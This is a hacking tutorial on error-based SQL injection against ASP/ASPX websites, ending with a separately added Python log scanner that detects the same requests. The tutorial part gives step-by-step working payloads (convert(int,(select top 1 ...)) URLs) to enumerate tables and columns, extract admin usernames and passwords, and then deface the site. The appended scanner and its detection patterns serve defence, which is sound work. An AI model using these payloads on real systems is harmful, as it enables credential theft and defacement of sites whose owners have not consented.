Hacking A Website Using ASP/ASPX Injection

Hello!
This time I am posting about ASPX injection.
Now let's start.

====================================================================================================================

ASPX injection is similar to PHP-based SQL injection. But here, we don't use queries that contain order by, union select, etc. Instead, we trick the server into responding with the information we need. It is an error-based injection technique: we get the information in the form of errors.
=============================
Step 1:
Find Out A Vulnerable Link
First, we need to find a vulnerable asp/aspx link, which looks like this:

www.vulnerablesite.com/gallery.aspx?id=10

=============================
Step 2:
Checking For Vulnerability
As in PHP-based injection, we test for the vulnerability by adding a single quote (') at the end of the URL.

www.vulnerablesite.com/gallery.aspx?id=10'

If it gives an error, then the site is vulnerable to asp/aspx injection.
In asp/aspx-based injections, we do not need to find out the number of columns or the most vulnerable column. We directly find out the table names and column names, and then we extract the data.

=============================
Step 3:
Finding Out The Table Names.

www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top 1 table_name from information_schema.tables))

The above code executes the second query and retrieves the first table name from the database. The Windows server cannot convert the character value into the int data type, so we get an error, and from that error we can read the first table name.
But this may not be the table we want, so we need to find the next table name in the database.
For that, we use the following query.

www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('first_table_name')))

Replace first_table_name with the actual table name we got above.
Now we get the second table name.
If this is still not the desired table, continue the procedure until you get the desired table name. The query now looks like this:

www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('first_table_name','second_table_name')))

Replace first_table_name and second_table_name with the table names we got in the above steps.

=============================
Step 4:
Finding Out The Columns
Now we have the admin table, so we need to find out its columns.

www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='admin_table'))

Replace admin_table with the table name we got. In my case, it is "vw_system_admin".

If the first column is not one of the columns we want, then follow the same steps as in step 3.

www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='admin_table' and column_name not in ('first_column_name')))

Replace first_column_name with the column name we got.

=============================

Step 5:
Extracting The Data
After finding out all the columns, we need to extract the data, such as user names and passwords.

For that, we use the following queries.

For user name:

www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top 1 admin_username from admin_table))

For password:

www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top 1 admin_password from admin_table))

Now Find Admin Panel.
& Deface It.

#Anonymous_Knw
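
A defender's view of the requests in steps 2 to 5, as an added example that is not part of the original post: a small Python scanner for IIS W3C logs that flags the trailing-quote probe and the convert(int,(select ...)) pattern, and separates the matches that were answered with HTTP 500. The rule set, the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed rules for the request shapes this post describes (not a product signature set).
RULES = [
    ("convert-int-subquery", re.compile(r"convert\s*\(\s*int\s*,\s*\(\s*select\b", re.I)),
    ("schema-enumeration", re.compile(r"information_schema\.(tables|columns)", re.I)),
    ("trailing-quote-probe", re.compile(r"=\s*\d+'\s*$")),
]

def decode(query, rounds=2):
    """URL-decode repeatedly so double-encoded payloads are also normalised."""
    for _ in range(rounds):
        query = unquote_plus(query)
    return query

def scan(lines):
    """Return (client_ip, uri_stem, status, matched_rules) for each suspicious request."""
    fields, hits = [], []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names declared by the log itself
            continue
        if line.startswith("#") or not line.strip():
            continue
        row = dict(zip(fields, line.split()))
        query = decode(row.get("cs-uri-query", "-"))
        matched = [name for name, rx in RULES if rx.search(query)]
        if matched:
            hits.append((row.get("c-ip"), row.get("cs-uri-stem"), int(row.get("sc-status", 0)), matched))
    return hits

def leaking(hits):
    """Matches answered with HTTP 500: the error page may have disclosed data."""
    return [h for h in hits if h[2] == 500 and "convert-int-subquery" in h[3]]

# Constructed sample log (documentation IP addresses, made-up site).
SAMPLE = """#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2024-01-01 10:00:01 GET /gallery.aspx id=10 198.51.100.7 200
2024-01-01 10:00:09 GET /gallery.aspx id=10' 203.0.113.5 500
2024-01-01 10:00:30 GET /gallery.aspx id=10+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables)) 203.0.113.5 500
2024-01-01 10:01:02 GET /gallery.aspx id=10%20and%201%3Dconvert%28int%2C%28select%20top%201%20admin_username%20from%20admin_table%29%29 203.0.113.5 200
""".splitlines()

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

A match answered with HTTP 500 means the conversion error probably reached the client. The fix on the application side is parameterized queries plus custom error pages, so that neither the injection nor the error text is available.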
